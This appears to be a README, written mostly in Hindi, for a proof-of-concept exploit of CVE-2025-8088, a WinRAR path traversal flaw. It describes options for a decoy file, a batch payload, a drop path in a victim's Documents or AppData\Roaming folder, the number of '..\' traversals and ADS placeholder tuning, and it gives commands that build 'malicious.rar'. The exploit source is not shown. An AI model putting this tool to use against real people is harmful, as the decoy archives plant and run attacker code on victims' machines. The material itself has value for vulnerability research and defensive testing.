
CVE-2025-8088 के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण, एक WinRAR पाथ ट्रैवर्सल भेद्यता जो क्राफ्टेड RAR अभिलेखागार के माध्यम से मनमाना कोड निष्पादन सक्षम बनाती है। अधिकृत सुरक्षा परीक्षण के लिए कॉन्फ़िगर करने योग्य डिकॉय, पेलोड और ड्रॉप पथ के साथ एक Python स्क्रिप्ट शामिल है।
Exploit_cve_2025_8088.ps1
python poc.py

| Argument | Description | Example |
|---|---|---|
--decoy | डिकॉय फ़ाइल का पथ (यदि मौजूद नहीं है तो बनाई जाएगी) | resume.txt |
--payload | पेलोड फ़ाइल का पथ (यदि मौजूद नहीं है तो बनाई जाएगी) | payload.bat |
--drop | पेलोड निकाले जाने वाले लक्ष्य निर्देशिका का पूर्ण पथ | C:\Users\Victim\Documents |
| Argument | Description | Default Value | Notes |
|---|---|---|---|
--rar | rar.exe का पथ | स्वतः-खोजा गया | सामान्य स्थानों और PATH की जाँच करेगा |
--out | आउटपुट RAR फ़ाइल नाम | poc-cve-2025-8088.rar | अंतिम दुर्भावनापूर्ण संग्रह |
--workdir | अस्थायी फ़ाइलों के लिए कार्यशील निर्देशिका | वर्तमान निर्देशिका (.) | |
--placeholder_len | ADS प्लेसहोल्डर की लंबाई | max(len(target_path), 128) | लंबा = अधिक विश्वसनीय ट्रैवर्सल |
--max_up | पैरेंट निर्देशिका ट्रैवर्सल की संख्या (..\) | 16 | न्यूनतम 8 अनुशंसित |
--base_out | मध्यवर्ती आधार RAR फ़ाइल नाम | <out>.base.rar | अस्थायी फ़ाइल, बाद में हटा दी जाती है |
# Basic usage (auto-discover rar.exe)
python poc.py --decoy resume.txt --payload payload.bat --drop "C:\Users\Victim\Documents"
# Full custom configuration
python poc.py \
--decoy document.pdf \
--payload script.bat \
--drop "C:\Users\Victim\AppData\Roaming" \
--rar "C:\Program Files\WinRAR\rar.exe" \
--out malicious.rar \
--workdir ./build \
--placeholder_len 150 \
--max_up 20